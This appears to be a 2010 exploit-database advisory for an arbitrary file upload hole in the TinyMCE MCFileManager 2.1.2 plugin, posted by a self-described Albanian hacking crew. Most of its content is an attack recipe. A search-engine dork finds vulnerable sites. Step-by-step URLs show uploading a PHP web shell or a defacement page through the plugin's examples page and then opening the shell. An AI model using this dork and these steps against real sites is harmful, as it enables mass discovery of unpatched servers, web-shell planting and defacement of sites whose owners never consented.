[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability
# Published : 2010-10-03
# Author : Hackeri-AL
# Previous Title : Aprox CMS Engine V6 Multiple Vulnerabilities
# Next Title : TradeMC E-Ticaret SQL and XSS Multiple Vulnerabilities
==============================================
File Upload Vulnerability [ Plugins tiny_mce ]
==============================================
http://tinymce.moxiecode.com/plugins_filemanager.php
####################################################################
Author : Hackeri-AL
Contact : h-al [at] hotmail [dot] it
Greetz : LoocK3D & b4cKd00r ~ & GHoST61 & BaDBoy
My Group : UAH-Crew = United Albania Hackers
####################################################################
[~] DORK: inurl:/tiny_mce/plugins/filemanager/
--------------------------------------------------------------------
[~] You go to : htpp://web.com/tiny_mce/plugins/filemanager/
[~] Redirect to : htpp://web.com/tiny_mce/plugins/filemanager/examples.html <[ upload here shell or index.html ]
[~] Shell or index : htpp://web.com/tiny_mce/plugins/filemanager/files/shell.php or index.html
####################################################################
[~] Proud 2 be Albania
[~] Proud 2 be Muslim
[~] United States of Albania
####################################################################